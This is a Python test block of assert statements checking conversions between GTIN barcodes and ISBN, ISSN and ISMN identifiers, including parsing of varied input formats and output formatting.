assert GTIN_from_ISBN('ISBN: 1-4028-9462-7') == GTIN('0-978-1-4028-9462-6')
assert GTIN_from_ISBN('ISBN-10: 1-56619-909-3') == GTIN('0-978-1-56619-909-4')
assert GTIN_from_ISBN('ISBN-13: 978-1-56619-909-4') == GTIN('0-978-1-56619-909-4')
assert GTIN_from_ISBN('ISBN 0-553-57335-7') == GTIN('0-978-0-553-57335-0')
assert GTIN_from_ISBN('306-40615-2') == GTIN('0-978-0-306-40615-7')
assert GTIN_from_ISBN('5864551155') == GTIN('0-978-586455115-8')
assert GTIN_from_ISBN('3896254170') == GTIN('0-978-389625417-7')
assert GTIN_from_ISBN('3-89625-417-0') == GTIN('0-978-3-89625-417-7')
assert GTIN_from_ISBN('0-306-40615-2') == GTIN('0-978-0-306-40615-7')
assert GTIN_from_ISBN('0201530821') == GTIN('0-978-020153082-7')
assert GTIN_from_ISBN('1-4028-9462-7') == GTIN('0-978-1-4028-9462-6')
assert GTIN_from_ISBN('1-56619-909-3') == GTIN('0-978-1-56619-909-4')
assert GTIN_from_ISBN('978-1-56619-909-4') == GTIN('0-978-1-56619-909-4')
assert GTIN_from_ISBN('0-553-57335-7') == GTIN('0-978-0-553-57335-0')
assert GTIN_from_ISBN('ISBN 0-937383-18-X') == GTIN('0-978-0937383-18-6')
assert GTIN_from_ISBN('International Standard Book Number 0-8352-2051-6') == GTIN('09780835220514')
assert GTIN_to_ISBN('0-978-0-306-40615-7', isbn13 = False) == 'ISBN 0-306-40615-2'
assert GTIN_to_ISBN('0-978-586455115-8', isbn13 = False) == 'ISBN 5-86455-115-5'
assert GTIN_to_ISBN('0-978-389625417-7', isbn13 = False) == 'ISBN 3-89625-417-0'
assert GTIN_to_ISBN('0-978-3-89625-417-7', isbn13 = False) == 'ISBN 3-89625-417-0'
assert GTIN_to_ISBN('0-978-0-306-40615-7', isbn13 = False) == 'ISBN 0-306-40615-2'
assert GTIN_to_ISBN('0-978-020153082-7', isbn13 = False) == 'ISBN 0-201-53082-1'
assert GTIN_to_ISBN('0-978-1-4028-9462-6', isbn13 = False) == 'ISBN 1-4028-9462-7'
assert GTIN_to_ISBN('0-978-1-56619-909-4', isbn13 = False) == 'ISBN 1-56619-909-3'
assert GTIN_to_ISBN('0-978-0-553-57335-0', isbn13 = False) == 'ISBN 0-553-57335-7'
assert GTIN_to_ISBN('0-978-0937383-18-6', isbn13 = False) == 'ISBN 0-937383-18-X'
assert GTIN_to_ISBN('09780835220514', isbn13 = False) == 'ISBN 0-8352-2051-6'
assert GTIN_to_ISBN('0-978-0-306-40615-7', isbn13 = True) == 'ISBN 978-0-306-40615-7'
assert GTIN_to_ISBN('0-978-586455115-8', isbn13 = True) == 'ISBN 978-5-86455-115-8'
assert GTIN_to_ISBN('0-978-389625417-7', isbn13 = True) == 'ISBN 978-3-89625-417-7'
assert GTIN_to_ISBN('0-978-3-89625-417-7', isbn13 = True) == 'ISBN 978-3-89625-417-7'
assert GTIN_to_ISBN('0-978-0-306-40615-7', isbn13 = True) == 'ISBN 978-0-306-40615-7'
assert GTIN_to_ISBN('0-978-020153082-7', isbn13 = True) == 'ISBN 978-0-201-53082-7'
assert GTIN_to_ISBN('0-978-1-4028-9462-6', isbn13 = True) == 'ISBN 978-1-4028-9462-6'
assert GTIN_to_ISBN('0-978-1-56619-909-4', isbn13 = True) == 'ISBN 978-1-56619-909-4'
assert GTIN_to_ISBN('0-978-0-553-57335-0', isbn13 = True) == 'ISBN 978-0-553-57335-0'
assert GTIN_to_ISBN('0-978-0937383-18-6', isbn13 = True) == 'ISBN 978-0-937383-18-6'
assert GTIN_to_ISBN('09780835220514', isbn13 = True) == 'ISBN 978-0-8352-2051-4'
# test the ISBN wrapper class
assert ISBN('SBN 306-40615-2') == GTIN('0-978-0-306-40615-7')
assert ISBN('ISBN 5864551155') == GTIN('0-978-586455115-8')
assert ISBN('ISBN 3896254170') == GTIN('0-978-389625417-7')
assert ISBN('ISBN 3-89625-417-0') == GTIN('0-978-3-89625-417-7')
assert ISBN('ISBN 0-306-40615-2') == GTIN('0-978-0-306-40615-7')
assert ISBN('ISBN 0201530821') == GTIN('0-978-020153082-7')
assert ISBN('ISBN: 1-4028-9462-7') == GTIN('0-978-1-4028-9462-6')
assert ISBN('ISBN-10: 1-56619-909-3') == GTIN('0-978-1-56619-909-4')
assert ISBN('ISBN-13: 978-1-56619-909-4') == GTIN('0-978-1-56619-909-4')
assert ISBN('ISBN 0-553-57335-7') == GTIN('0-978-0-553-57335-0')
assert ISBN('ISBN 0-937383-18-X') == GTIN('0-978-0937383-18-6')
assert ISBN('International Standard Book Number 0-8352-2051-6') == GTIN('09780835220514')
global isbn13_override
old_isbn13_override = isbn13_override
try:
# simulate operation before the 2007-01-01 switch to ISBN-13
isbn13_override = False
assert str(ISBN('ISBN 978-0-306-40615-7')) == 'ISBN 0-306-40615-2'
assert ISBN('ISBN 978-0-306-40615-7').__str__(short = True) == '0306406152'
assert str(ISBN('ISBN 978-586455115-8')) == 'ISBN 5-86455-115-5'
assert ISBN('ISBN 978-586455115-8').__str__(short = True) == '5864551155'
assert str(ISBN('ISBN 978-389625417-7')) == 'ISBN 3-89625-417-0'
assert ISBN('ISBN 978-389625417-7').__str__(short = True) == '3896254170'
assert str(ISBN('ISBN 978-3-89625-417-7')) == 'ISBN 3-89625-417-0'
assert ISBN('ISBN 978-3-89625-417-7').__str__(short = True) == '3896254170'
assert str(ISBN('ISBN 978-0-306-40615-7')) == 'ISBN 0-306-40615-2'
assert ISBN('ISBN 978-0-306-40615-7').__str__(short = True) == '0306406152'
assert str(ISBN('ISBN 978-020153082-7')) == 'ISBN 0-201-53082-1'
assert ISBN('ISBN 978-020153082-7').__str__(short = True) == '0201530821'
assert str(ISBN('ISBN 978-1-4028-9462-6')) == 'ISBN 1-4028-9462-7'
assert ISBN('ISBN 978-1-4028-9462-6').__str__(short = True) == '1402894627'
assert str(ISBN('ISBN 978-1-56619-909-4')) == 'ISBN 1-56619-909-3'
assert ISBN('ISBN 978-1-56619-909-4').__str__(short = True) == '1566199093'
assert str(ISBN('ISBN 978-0-553-57335-0')) == 'ISBN 0-553-57335-7'
assert ISBN('ISBN 978-0-553-57335-0').__str__(short = True) == '0553573357'
assert str(ISBN('ISBN 0-937383-18-X')) == 'ISBN 0-937383-18-X'
assert ISBN('ISBN 0-937383-18-X').__str__(short = True) == '093738318X'
assert str(ISBN('International Standard Book Number 0-8352-2051-6')) == 'ISBN 0-8352-2051-6'
assert ISBN('International Standard Book Number 0-8352-2051-6').__str__(short = True) == '0835220516'
# simulate operation after the 2007-01-01 switch to ISBN-13
isbn13_override = True
assert str(ISBN('ISBN 978-0-306-40615-7')) == 'ISBN 978-0-306-40615-7'
assert ISBN('ISBN 978-0-306-40615-7').__str__(short = True) == '9780306406157'
assert str(ISBN('ISBN 978-586455115-8')) == 'ISBN 978-5-86455-115-8'
assert ISBN('ISBN 978-586455115-8').__str__(short = True) == '9785864551158'
assert str(ISBN('ISBN 978-389625417-7')) == 'ISBN 978-3-89625-417-7'
assert ISBN('ISBN 978-389625417-7').__str__(short = True) == '9783896254177'
assert str(ISBN('ISBN 978-3-89625-417-7')) == 'ISBN 978-3-89625-417-7'
assert ISBN('ISBN 978-3-89625-417-7').__str__(short = True) == '9783896254177'
assert str(ISBN('ISBN 978-0-306-40615-7')) == 'ISBN 978-0-306-40615-7'
assert ISBN('ISBN 978-0-306-40615-7').__str__(short = True) == '9780306406157'
assert str(ISBN('ISBN 978-020153082-7')) == 'ISBN 978-0-201-53082-7'
assert ISBN('ISBN 978-020153082-7').__str__(short = True) == '9780201530827'
assert str(ISBN('ISBN 978-1-4028-9462-6')) == 'ISBN 978-1-4028-9462-6'
assert ISBN('ISBN 978-1-4028-9462-6').__str__(short = True) == '9781402894626'
assert str(ISBN('ISBN 978-1-56619-909-4')) == 'ISBN 978-1-56619-909-4'
assert ISBN('ISBN 978-1-56619-909-4').__str__(short = True) == '9781566199094'
assert str(ISBN('ISBN 978-0-553-57335-0')) == 'ISBN 978-0-553-57335-0'
assert ISBN('ISBN 978-0-553-57335-0').__str__(short = True) == '9780553573350'
assert str(ISBN('ISBN 0-937383-18-X')) == 'ISBN 978-0-937383-18-6'
assert ISBN('ISBN 0-937383-18-X').__str__(short = True) == '9780937383186'
assert str(ISBN('International Standard Book Number 0-8352-2051-6')) == 'ISBN 978-0-8352-2051-4'
assert ISBN('International Standard Book Number 0-8352-2051-6').__str__(short = True) == '9780835220514'
assert str(ISBN('ISBN 0-306-40615-2')) == 'ISBN 978-0-306-40615-7'
assert ISBN('0306406152').__str__(short = True) == '9780306406157'
assert str(ISBN('ISBN 5-86455-115-5')) == 'ISBN 978-5-86455-115-8'
assert ISBN('5864551155').__str__(short = True) == '9785864551158'
assert str(ISBN('ISBN 3-89625-417-0')) == 'ISBN 978-3-89625-417-7'
assert ISBN('3896254170').__str__(short = True) == '9783896254177'
assert str(ISBN('ISBN 3-89625-417-0')) == 'ISBN 978-3-89625-417-7'
assert ISBN('3896254170').__str__(short = True) == '9783896254177'
assert str(ISBN('ISBN 0-306-40615-2')) == 'ISBN 978-0-306-40615-7'
assert ISBN('0306406152').__str__(short = True) == '9780306406157'
assert str(ISBN('ISBN 0-201-53082-1')) == 'ISBN 978-0-201-53082-7'
assert ISBN('0201530821').__str__(short = True) == '9780201530827'
assert str(ISBN('ISBN 1-4028-9462-7')) == 'ISBN 978-1-4028-9462-6'
assert ISBN('1402894627').__str__(short = True) == '9781402894626'
assert str(ISBN('ISBN 1-56619-909-3')) == 'ISBN 978-1-56619-909-4'
assert ISBN('1566199093').__str__(short = True) == '9781566199094'
assert str(ISBN('ISBN 0-553-57335-7')) == 'ISBN 978-0-553-57335-0'
assert ISBN('0553573357').__str__(short = True) == '9780553573350'
finally:
isbn13_override = old_isbn13_override
# test ISSN conversion
assert GTIN_from_ISSN('ISSN 0953-4563') == GTIN('09770953456001')
assert GTIN_to_ISSN('09770953456001') == 'ISSN: 0953-4563'
# test the ISSN wrapper class
assert ISSN('ISSN: 0953-4563') == GTIN('09770953456001')
assert str(ISSN('ISSN: 0953-4563')) == 'ISSN: 0953-4563'
assert ISSN('ISSN: 0953-4563').__str__(short = True) == 'ISSN09534563'
assert ISSN('ISSN: 1304-2386') == GTIN('09771304238000')
assert str(ISSN('ISSN: 1304-2386')) == 'ISSN: 1304-2386'
assert ISSN('ISSN: 1304-2386').__str__(short = True) == 'ISSN13042386'
assert ISSN('ISSN 0953-4563') == GTIN('09770953456001')
assert str(ISSN('ISSN 0953-4563')) == 'ISSN: 0953-4563'
assert ISSN('ISSN 0953-4563').__str__(short = True) == 'ISSN09534563'
assert ISSN('ISSN 1304-2386') == GTIN('09771304238000')
assert str(ISSN('ISSN 1304-2386')) == 'ISSN: 1304-2386'
assert ISSN('ISSN 1304-2386').__str__(short = True) == 'ISSN13042386'
assert ISSN('issn: 0953-4563') == GTIN('09770953456001')
assert str(ISSN('issn: 0953-4563')) == 'ISSN: 0953-4563'
assert ISSN('issn: 0953-4563').__str__(short = True) == 'ISSN09534563'
assert ISSN('issn: 1304-2386') == GTIN('09771304238000')
assert str(ISSN('issn: 1304-2386')) == 'ISSN: 1304-2386'
assert ISSN('issn: 1304-2386').__str__(short = True) == 'ISSN13042386'
assert ISSN('issn 0953-4563') == GTIN('09770953456001')
assert str(ISSN('issn 0953-4563')) == 'ISSN: 0953-4563'
assert ISSN('issn 0953-4563').__str__(short = True) == 'ISSN09534563'
assert ISSN('issn 1304-2386') == GTIN('09771304238000')
assert str(ISSN('issn 1304-2386')) == 'ISSN: 1304-2386'
assert ISSN('issn 1304-2386').__str__(short = True) == 'ISSN13042386'
# test ISMN conversion
assert GTIN_from_ISMN('M-571-10051-3') == GTIN('979-0-571-10051-3')
assert GTIN_from_ISMN('ISMN M-706700-00-7') == GTIN('9790706700007')
assert GTIN_from_ISMN('9790345123458') == GTIN('9790345123458')
assert GTIN_from_ISMN('ismn-10: m 299102349') == GTIN('0 979 0 299102349')
assert GTIN_from_ISMN('ismn-10: m 299102349') == GTIN('09790299102349')
assert GTIN_from_ISMN('ISMN-10 M 299102349') == GTIN('0 979 0 299102349')
assert GTIN_from_ISMN('ISMN-10 M 299102349') == GTIN('09790299102349')
assert GTIN_from_ISMN('ISMN-10: M 299102349') == GTIN('0 979 0 299102349')
assert GTIN_from_ISMN('ISMN-10: M 299102349') == GTIN('09790299102349')
assert GTIN_from_ISMN('ismn-10: m-321-76543-6') == GTIN('0-979-0-321-76543-6')
assert GTIN_from_ISMN('ISMN-10 M-321-76543-6') == GTIN('0-979-0-321-76543-6')
assert GTIN_from_ISMN('ISMN-10: M-321-76543-6') == GTIN('0-979-0-321-76543-6')
assert GTIN_from_ISMN('ismn-10: m-321-76544-3') == GTIN('0-979-0-321-76544-3')
assert GTIN_from_ISMN('ISMN-10 M-321-76544-3') == GTIN('0-979-0-321-76544-3')
assert GTIN_from_ISMN('ISMN-10: M-321-76544-3') == GTIN('0-979-0-321-76544-3')
assert GTIN_from_ISMN('ismn-10: m-321-76545-0') == GTIN('0-979-0-321-76545-0')
assert GTIN_from_ISMN('ISMN-10 M-321-76545-0') == GTIN('0-979-0-321-76545-0')
assert GTIN_from_ISMN('ISMN-10: M-321-76545-0') == GTIN('0-979-0-321-76545-0')
assert GTIN_from_ISMN('ismn-10: m-321-76546-7') == GTIN('0-979-0-321-76546-7')
assert GTIN_from_ISMN('ISMN-10 M-321-76546-7') == GTIN('0-979-0-321-76546-7')
assert GTIN_from_ISMN('ISMN-10: M-321-76546-7') == GTIN('0-979-0-321-76546-7')
assert GTIN_from_ISMN('ismn-10: m-321-76547-4') == GTIN('0-979-0-321-76547-4')
assert GTIN_from_ISMN('ISMN-10 M-321-76547-4') == GTIN('0-979-0-321-76547-4')
assert GTIN_from_ISMN('ISMN-10: M-321-76547-4') == GTIN('0-979-0-321-76547-4')
assert GTIN_from_ISMN('ismn-10: m-321-76548-1') == GTIN('0-979-0-321-76548-1')
assert GTIN_from_ISMN('ISMN-10 M-321-76548-1') == GTIN('0-979-0-321-76548-1')
assert GTIN_from_ISMN('ISMN-10: M-321-76548-1') == GTIN('0-979-0-321-76548-1')
assert GTIN_from_ISMN('ismn-10: m-321-76549-8') == GTIN('0-979-0-321-76549-8')
assert GTIN_from_ISMN('ISMN-10 M-321-76549-8') == GTIN('0-979-0-321-76549-8')
assert GTIN_from_ISMN('ISMN-10: M-321-76549-8') == GTIN('0-979-0-321-76549-8')
assert GTIN_from_ISMN('ismn-10: m-321-76550-4') == GTIN('0-979-0-321-76550-4')
assert GTIN_from_ISMN('ISMN-10 M-321-76550-4') == GTIN('0-979-0-321-76550-4')
assert GTIN_from_ISMN('ISMN-10: M-321-76550-4') == GTIN('0-979-0-321-76550-4')
assert GTIN_from_ISMN('ismn-10: m-321-76551-1') == GTIN('0-979-0-321-76551-1')
assert GTIN_from_ISMN('ISMN-10 M-321-76551-1') == GTIN('0-979-0-321-76551-1')
assert GTIN_from_ISMN('ISMN-10: M-321-76551-1') == GTIN('0-979-0-321-76551-1')
assert GTIN_from_ISMN('ismn-10: m-345-12345-8') == GTIN('0-979-0-345-12345-8')
assert GTIN_from_ISMN('ISMN-10 M-345-12345-8') == GTIN('0-979-0-345-12345-8')
assert GTIN_from_ISMN('ISMN-10: M-345-12345-8') == GTIN('0-979-0-345-12345-8')
assert GTIN_from_ISMN('ismn-13: 979 0 123 45678 5') == GTIN('0 979 0 123 45678 5')
assert GTIN_from_ISMN('ismn-13: 979-0-123-45678-5') == GTIN('0-979-0-123-45678-5')
assert GTIN_from_ISMN('ISMN-13 979 0 123 45678 5') == GTIN('0 979 0 123 45678 5')
assert GTIN_from_ISMN('ISMN-13 979-0-123-45678-5') == GTIN('0-979-0-123-45678-5')
assert GTIN_from_ISMN('ISMN-13: 979 0 123 45678 5') == GTIN('0 979 0 123 45678 5')
assert GTIN_from_ISMN('ISMN-13: 979-0-123-45678-5') == GTIN('0-979-0-123-45678-5')
assert GTIN_from_ISMN('ismn: 979 0 123 45678 5') == GTIN('0 979 0 123 45678 5')
assert GTIN_from_ISMN('ismn: 979-0-123-45678-5') == GTIN('0-979-0-123-45678-5')
assert GTIN_from_ISMN('ISMN 979 0 123 45678 5') == GTIN('0 979 0 123 45678 5')
assert GTIN_from_ISMN('ISMN 979-0-123-45678-5') == GTIN('0-979-0-123-45678-5')
assert GTIN_from_ISMN('ISMN: 979 0 123 45678 5') == GTIN('0 979 0 123 45678 5')
assert GTIN_from_ISMN('ISMN: 979-0-123-45678-5') == GTIN('0-979-0-123-45678-5')
assert GTIN_from_ISMN('ismn: m 299102349') == GTIN('0 979 0 299102349')
assert GTIN_from_ISMN('ismn: m 299102349') == GTIN('09790299102349')
assert GTIN_from_ISMN('ISMN M 299102349') == GTIN('0 979 0 299102349')
assert GTIN_from_ISMN('ISMN M 299102349') == GTIN('09790299102349')
assert GTIN_from_ISMN('ISMN: M 299102349') == GTIN('0 979 0 299102349')
assert GTIN_from_ISMN('ISMN: M 299102349') == GTIN('09790299102349')
assert GTIN_from_ISMN('ismn: m-321-76543-6') == GTIN('0-979-0-321-76543-6')
assert GTIN_from_ISMN('ISMN M-321-76543-6') == GTIN('0-979-0-321-76543-6')
assert GTIN_from_ISMN('ISMN: M-321-76543-6') == GTIN('0-979-0-321-76543-6')
assert GTIN_from_ISMN('ismn: m-321-76544-3') == GTIN('0-979-0-321-76544-3')
assert GTIN_from_ISMN('ISMN M-321-76544-3') == GTIN('0-979-0-321-76544-3')
assert GTIN_from_ISMN('ISMN: M-321-76544-3') == GTIN('0-979-0-321-76544-3')
assert GTIN_from_ISMN('ismn: m-321-76545-0') == GTIN('0-979-0-321-76545-0')
assert GTIN_from_ISMN('ISMN M-321-76545-0') == GTIN('0-979-0-321-76545-0')
assert GTIN_from_ISMN('ISMN: M-321-76545-0') == GTIN('0-979-0-321-76545-0')
assert GTIN_from_ISMN('ismn: m-321-76546-7') == GTIN('0-979-0-321-76546-7')
assert GTIN_from_ISMN('ISMN M-321-76546-7') == GTIN('0-979-0-321-76546-7')
assert GTIN_from_ISMN('ISMN: M-321-76546-7') == GTIN('0-979-0-321-76546-7')
assert GTIN_from_ISMN('ismn: m-321-76547-4') == GTIN('0-979-0-321-76547-4')
assert GTIN_from_ISMN('ISMN M-321-76547-4') == GTIN('0-979-0-321-76547-4')
assert GTIN_from_ISMN('ISMN: M-321-76547-4') == GTIN('0-979-0-321-76547-4')
assert GTIN_from_ISMN('ismn: m-321-76548-1') == GTIN('0-979-0-321-76548-1')
assert GTIN_from_ISMN('ISMN M-321-76548-1') == GTIN('0-979-0-321-76548-1')
assert GTIN_from_ISMN('ISMN: M-321-76548-1') == GTIN('0-979-0-321-76548-1')
assert GTIN_from_ISMN('ismn: m-321-76549-8') == GTIN('0-979-0-321-76549-8')
assert GTIN_from_ISMN('ISMN M-321-76549-8') == GTIN('0-979-0-321-76549-8')
assert GTIN_from_ISMN('ISMN: M-321-76549-8') == GTIN('0-979-0-321-76549-8')
assert GTIN_from_ISMN('ismn: m-321-76550-4') == GTIN('0-979-0-321-76550-4')
assert GTIN_from_ISMN('ISMN M-321-76550-4') == GTIN('0-979-0-321-76550-4')
assert GTIN_from_ISMN('ISMN: M-321-76550-4') == GTIN('0-979-0-321-76550-4')
assert GTIN_from_ISMN('ismn: m-321-76551-1') == GTIN('0-979-0-321-76551-1')
assert GTIN_from_ISMN('ISMN M-321-76551-1') == GTIN('0-979-0-321-76551-1')
assert GTIN_from_ISMN('ISMN: M-321-76551-1') == GTIN('0-979-0-321-76551-1')
assert GTIN_from_ISMN('ismn: m-345-12345-8') == GTIN('0-979-0-345-12345-8')
assert GTIN_from_ISMN('ISMN M-345-12345-8') == GTIN('0-979-0-345-12345-8')
assert GTIN_from_ISMN('ISMN: M-345-12345-8') == GTIN('0-979-0-345-12345-8')
assert GTIN_from_ISMN('m345123458') == GTIN('9790345123458')
assert GTIN_from_ISMN('M345123458') == GTIN('9790345123458')
assert GTIN_to_ISMN('0 979 0 123 45678 5') == 'ISMN M-1234-5678-5'
assert GTIN_to_ISMN('0-979-0-123-45678-5') == 'ISMN M-1234-5678-5'
assert GTIN_to_ISMN('0 979 0 299102349') == 'ISMN M-2991-0234-9'
assert GTIN_to_ISMN('09790299102349') == 'ISMN M-2991-0234-9'
assert GTIN_to_ISMN('0-979-0-321-76543-6') == 'ISMN M-3217-6543-6'
assert GTIN_to_ISMN('0-979-0-321-76544-3') == 'ISMN M-3217-6544-3'
assert GTIN_to_ISMN('0-979-0-321-76545-0') == 'ISMN M-3217-6545-0'
assert GTIN_to_ISMN('0-979-0-321-76546-7') == 'ISMN M-3217-6546-7'
assert GTIN_to_ISMN('0-979-0-321-76547-4') == 'ISMN M-3217-6547-4'
assert GTIN_to_ISMN('0-979-0-321-76548-1') == 'ISMN M-3217-6548-1'
assert GTIN_to_ISMN('0-979-0-321-76549-8') == 'ISMN M-3217-6549-8'
assert GTIN_to_ISMN('0-979-0-321-76550-4') == 'ISMN M-3217-6550-4'
assert GTIN_to_ISMN('0-979-0-321-76551-1') == 'ISMN M-3217-6551-1'
assert GTIN_to_ISMN('0-979-0-345-12345-8') == 'ISMN M-3451-2345-8'
assert GTIN_to_ISMN('9790345123458') == 'ISMN M-3451-2345-8'
# test the ISMN wrapper class
assert ISMN('M-571-10051-3') == GTIN('979-0-571-10051-3')
assert ISMN('ISMN M-706700-00-7') == GTIN('9790706700007')
assert ISMN('9790345123458') == GTIN('9790345123458')
assert ISMN('ismn-10: m 299102349') == GTIN('0 979 0 299102349')
assert ISMN('ismn-10: m 299102349') == GTIN('09790299102349')
assert ISMN('ISMN-10 M 299102349') == GTIN('0 979 0 299102349')
assert ISMN('ISMN-10 M 299102349') == GTIN('09790299102349')
assert ISMN('ISMN-10: M 299102349') == GTIN('0 979 0 299102349')
assert ISMN('ISMN-10: M 299102349') == GTIN('09790299102349')
assert ISMN('ismn-10: m-321-76543-6') == GTIN('0-979-0-321-76543-6')
assert ISMN('ISMN-10 M-321-76543-6') == GTIN('0-979-0-321-76543-6')
assert ISMN('ISMN-10: M-321-76543-6') == GTIN('0-979-0-321-76543-6')
assert ISMN('ismn-10: m-321-76544-3') == GTIN('0-979-0-321-76544-3')
assert ISMN('ISMN-10 M-321-76544-3') == GTIN('0-979-0-321-76544-3')
assert ISMN('ISMN-10: M-321-76544-3') == GTIN('0-979-0-321-76544-3')
assert ISMN('ismn-10: m-321-76545-0') == GTIN('0-979-0-321-76545-0')
assert ISMN('ISMN-10 M-321-76545-0') == GTIN('0-979-0-321-76545-0')
assert ISMN('ISMN-10: M-321-76545-0') == GTIN('0-979-0-321-76545-0')
assert ISMN('ismn-10: m-321-76546-7') == GTIN('0-979-0-321-76546-7')
assert ISMN('ISMN-10 M-321-76546-7') == GTIN('0-979-0-321-76546-7')
assert ISMN('ISMN-10: M-321-76546-7') == GTIN('0-979-0-321-76546-7')
assert ISMN('ismn-10: m-321-76547-4') == GTIN('0-979-0-321-76547-4')
assert ISMN('ISMN-10 M-321-76547-4') == GTIN('0-979-0-321-76547-4')
assert ISMN('ISMN-10: M-321-76547-4') == GTIN('0-979-0-321-76547-4')
assert ISMN('ismn-10: m-321-76548-1') == GTIN('0-979-0-321-76548-1')
assert ISMN('ISMN-10 M-321-76548-1') == GTIN('0-979-0-321-76548-1')
assert ISMN('ISMN-10: M-321-76548-1') == GTIN('0-979-0-321-76548-1')
assert ISMN('ismn-10: m-321-76549-8') == GTIN('0-979-0-321-76549-8')
assert ISMN('ISMN-10 M-321-76549-8') == GTIN('0-979-0-321-76549-8')
assert ISMN('ISMN-10: M-321-76549-8') == GTIN('0-979-0-321-76549-8')
assert ISMN('ismn-10: m-321-76550-4') == GTIN('0-979-0-321-76550-4')
assert ISMN('ISMN-10 M-321-76550-4') == GTIN('0-979-0-321-76550-4')
assert ISMN('ISMN-10: M-321-76550-4') == GTIN('0-979-0-321-76550-4')
assert ISMN('ismn-10: m-321-76551-1') == GTIN('0-979-0-321-76551-1')
assert ISMN('ISMN-10 M-321-76551-1') == GTIN('0-979-0-321-76551-1')
assert ISMN('ISMN-10: M-321-76551-1') == GTIN('0-979-0-321-76551-1')
assert ISMN('ismn-10: m-345-12345-8') == GTIN('0-979-0-345-12345-8')
assert ISMN('ISMN-10 M-345-12345-8') == GTIN('0-979-0-345-12345-8')
assert ISMN('ISMN-10: M-345-12345-8') == GTIN('0-979-0-345-12345-8')
assert ISMN('ismn-13: 979 0 123 45678 5') == GTIN('0 979 0 123 45678 5')
assert ISMN('ismn-13: 979-0-123-45678-5') == GTIN('0-979-0-123-45678-5')
assert ISMN('ISMN-13 979 0 123 45678 5') == GTIN('0 979 0 123 45678 5')
assert ISMN('ISMN-13 979-0-123-45678-5') == GTIN('0-979-0-123-45678-5')
assert ISMN('ISMN-13: 979 0 123 45678 5') == GTIN('0 979 0 123 45678 5')
assert ISMN('ISMN-13: 979-0-123-45678-5') == GTIN('0-979-0-123-45678-5')
assert ISMN('ismn: 979 0 123 45678 5') == GTIN('0 979 0 123 45678 5')
assert ISMN('ismn: 979-0-123-45678-5') == GTIN('0-979-0-123-45678-5')
assert ISMN('ISMN 979 0 123 45678 5') == GTIN('0 979 0 123 45678 5')
assert ISMN('ISMN 979-0-123-45678-5') == GTIN('0-979-0-123-45678-5')
assert ISMN('ISMN: 979 0 123 45678 5') == GTIN('0 979 0 123 45678 5')
assert ISMN('ISMN: 979-0-123-45678-5') == GTIN('0-979-0-123-45678-5')
assert ISMN('ismn: m 299102349') == GTIN('0 979 0 299102349')
assert ISMN('ismn: m 299102349') == GTIN('09790299102349')
assert ISMN('ISMN M 299102349') == GTIN('0 979 0 299102349')
assert ISMN('ISMN M 299102349') == GTIN('09790299102349')
assert ISMN('ISMN: M 299102349') == GTIN('0 979 0 299102349')
assert ISMN('ISMN: M 299102349') == GTIN('09790299102349')
assert ISMN('ismn: m-321-76543-6') == GTIN('0-979-0-321-76543-6')
assert ISMN('ISMN M-321-76543-6') == GTIN('0-979-0-321-76543-6')
assert ISMN('ISMN: M-321-76543-6') == GTIN('0-979-0-321-76543-6')
assert ISMN('ismn: m-321-76544-3') == GTIN('0-979-0-321-76544-3')
assert ISMN('ISMN M-321-76544-3') == GTIN('0-979-0-321-76544-3')
assert ISMN('ISMN: M-321-76544-3') == GTIN('0-979-0-321-76544-3')
assert ISMN('ismn: m-321-76545-0') == GTIN('0-979-0-321-76545-0')
assert ISMN('ISMN M-321-76545-0') == GTIN('0-979-0-321-76545-0')
assert ISMN('ISMN: M-321-76545-0') == GTIN('0-979-0-321-76545-0')
assert ISMN('ismn: m-321-76546-7') == GTIN('0-979-0-321-76546-7')
assert ISMN('ISMN M-321-76546-7') == GTIN('0-979-0-321-76546-7')
assert ISMN('ISMN: M-321-76546-7') == GTIN('0-979-0-321-76546-7')
assert ISMN('ismn: m-321-76547-4') == GTIN('0-979-0-321-76547-4')
assert ISMN('ISMN M-321-76547-4') == GTIN('0-979-0-321-76547-4')
assert ISMN('ISMN: M-321-76547-4') == GTIN('0-979-0-321-76547-4')
assert ISMN('ismn: m-321-76548-1') == GTIN('0-979-0-321-76548-1')
assert ISMN('ISMN M-321-76548-1') == GTIN('0-979-0-321-76548-1')
assert ISMN('ISMN: M-321-76548-1') == GTIN('0-979-0-321-76548-1')
assert ISMN('ismn: m-321-76549-8') == GTIN('0-979-0-321-76549-8')
assert ISMN('ISMN M-321-76549-8') == GTIN('0-979-0-321-76549-8')
assert ISMN('ISMN: M-321-76549-8') == GTIN('0-979-0-321-76549-8')
assert ISMN('ismn: m-321-76550-4') == GTIN('0-979-0-321-76550-4')
assert ISMN('ISMN M-321-76550-4') == GTIN('0-979-0-321-76550-4')
assert ISMN('ISMN: M-321-76550-4') == GTIN('0-979-0-321-76550-4')
assert ISMN('ismn: m-321-76551-1') == GTIN('0-979-0-321-76551-1')
assert ISMN('ISMN M-321-76551-1') == GTIN('0-979-0-321-76551-1')
assert ISMN('ISMN: M-321-76551-1') == GTIN('0-979-0-321-76551-1')
assert ISMN('ismn: m-345-12345-8') == GTIN('0-979-0-345-12345-8')
assert ISMN('ISMN M-345-12345-8') == GTIN('0-979-0-345-12345-8')
assert ISMN('ISMN: M-345-12345-8') == GTIN('0-979-0-345-12345-8')
assert ISMN('m345123458') == GTIN('9790345123458')
assert ISMN('M345123458') == GTIN('9790345123458')
assert str(ISMN('ISMN 979 0 123 45678 5')) == 'ISMN M-1234-5678-5'
assert str(ISMN('ISMN 979-0-123-45678-5')) == 'ISMN M-1234-5678-5'
assert str(ISMN('ISMN 979 0 299102349')) == 'ISMN M-2991-0234-9'
assert str(ISMN('ISMN 9790299102349')) == 'ISMN M-2991-0234-9'
assert str(ISMN('ISMN 979-0-321-76543-6')) == 'ISMN M-3217-6543-6'
assert str(ISMN('ISMN 979-0-321-76544-3')) == 'ISMN M-3217-6544-3'
assert str(ISMN('ISMN 979-0-321-76545-0')) == 'ISMN M-3217-6545-0'
assert str(ISMN('ISMN 979-0-321-76546-7')) == 'ISMN M-3217-6546-7'
assert str(ISMN('ISMN 979-0-321-76547-4')) == 'ISMN M-3217-6547-4'
assert str(ISMN('ISMN 979-0-321-76548-1')) == 'ISMN M-3217-6548-1'
assert str(ISMN('ISMN 979-0-321-76549-8')) == 'ISMN M-3217-6549-8'
assert str(ISMN('ISMN 979-0-321-76550-4')) == 'ISMN M-3217-6550-4'
assert str(ISMN('ISMN 979-0-321-76551-1')) == 'ISMN M-3217-6551-1'
assert str(ISMN('ISMN 979-0-345-12345-8')) == 'ISMN M-3451-2345-8'
assert str(ISMN('International Standard Music Number 979-0-345-12345-8')) == 'ISMN M-3451-2345-8'
